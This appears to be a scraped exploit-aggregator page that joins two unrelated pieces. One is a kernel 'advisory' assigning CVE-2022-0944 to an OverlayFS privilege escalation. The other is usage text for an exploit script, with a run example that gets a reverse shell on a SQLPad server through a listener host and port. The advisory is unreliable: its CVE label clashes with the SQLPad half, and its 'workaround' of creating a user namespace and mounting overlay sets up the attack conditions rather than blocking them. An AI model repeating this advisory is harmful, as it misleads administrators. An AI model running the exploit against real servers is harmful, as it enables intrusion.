## https://sploitus.com/exploit?id=565A3798-7C3B-5A5C-B744-4A5B7EA4D08A
# CVE-2022-0944: Privilege Escalation Vulnerability in OverlayFS
[NVD entry](https://nvd.nist.gov/vuln/detail/CVE-2022-0944)
[CVE Details entry](https://www.cvedetails.com/cve/CVE-2022-0944/)
Security advisory and mitigation guide for the Linux kernel privilege escalation vulnerability in OverlayFS.
## Overview
**CVE-2022-0944** is a security vulnerability in the Linux kernel's OverlayFS subsystem that allows local attackers to escalate privileges through improper handling of file creation in specific configurations.
## Technical Details

### Impact
A local attacker could:
- Gain root privileges through crafted file operations
- Bypass security restrictions
- Modify sensitive system files
- Compromise entire system integrity
### Detection
1. Check the kernel version:
```bash
uname -r
# Affected versions: 5.8 <= kernel < 5.16.12
```
2. Verify OverlayFS usage:
```bash
mount | grep overlay
# Systems using OverlayFS mounts are at risk
```
3. Check security advisories:
```bash
# For Debian/Ubuntu:
grep CVE-2022-0944 /var/log/apt/history.log
# For RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944
```
### Mitigation
**Official patches**
Update to one of these patched versions:
- Linux kernel 5.16.12 or later
- Vendor-specific backported patches

Update command:
```bash
# Ubuntu/Debian
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
# RHEL/CentOS
sudo yum update kernel
```
**Workarounds (if patching is not immediate)**
Restrict OverlayFS usage by unloading the module:
```bash
sudo modprobe -r overlay
```
Implement namespace restrictions:
```bash
# Create unprivileged user namespace
unshare -Ur
# Mount with user restrictions
mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
```
Apply SELinux/AppArmor policies. With SELinux enforcing, an unauthorised overlay mount attempt by an unprivileged user produces an audit denial like the following (`mounton` denied for the `user_t` domain):
```
type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }
```
### Disclaimer
This document is provided for informational purposes only. While efforts have been made to ensure accuracy,
no guarantee is provided. Always test patches in a development environment before production deployment.
Last Updated: 2023-10-01
## Usage
```text
usage: main.py [-h] url lhost lport [username] [password]

positional arguments:
  url         URL to SQLPad
  lhost       Listener host address for reverse shell
  lport       Listener port for reverse shell
  username    login username (optional)
  password    login password (optional)

options:
  -h, --help  show this help message and exit
```
**Example:**
```bash
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
```
# Disclaimer
This repository contains code and tools that are intended solely for educational purposes, specifically for use in cybersecurity courses and learning environments. The author of this code assumes no responsibility for any consequences arising from the use, misuse, or modification of this code. The code is provided "as is" without any warranty, either express or implied, including but not limited to the implied warranties of merchantability or fitness for a particular purpose.